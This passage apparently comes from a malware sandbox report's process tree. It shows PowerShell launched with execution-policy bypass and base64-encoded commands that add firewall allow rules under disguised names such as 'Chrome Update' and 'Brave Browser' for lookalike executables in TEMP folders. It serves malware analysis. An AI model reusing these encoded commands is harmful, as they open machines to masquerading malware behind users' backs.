CAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARwByAG8AdQBwACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
      4⤵
      PID:5644
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2408
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6195.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6192.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6193.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6194.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFQAdQBuAGkAbgBnACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
      4⤵
      PID:1380
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:3156
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss65EF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi65EC.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr65ED.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr65EE.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:3888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAdQBiAG4AZQB0AHcAbwByAGsAIABDAG8AbgB0AHIAbwBsACAAQwBlAG4AdABlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIABDAGUAbgB0AGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFQAQwBQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABUAEMAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      PID:5696
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2352
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6AB7.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6AB4.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6AB5.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6AB6.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARwByAG8AdQBwACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB0AHIAYQBmAGYAbQBvAG4AZQB0AGkAegBlAHIAXABhAHAAcABcAFQAZQB4AHQAbABuAHAAdQB0AEgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVQBEAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABVAEQAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAA==
      4⤵
      PID:5476
    - - C:\Windows\SysWOW64\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:428
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7933.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7920.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7921.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7922.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAVQBzAGUAcgAwADAAQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABFAFUATABBACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAEUAVQBMAEEAIgAgAC0ARwByAG8AdQBwACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACAARQBVAEwAQQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      PID:528
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:4652
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7D7E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7D6B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7D6C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7D6D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:3056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAA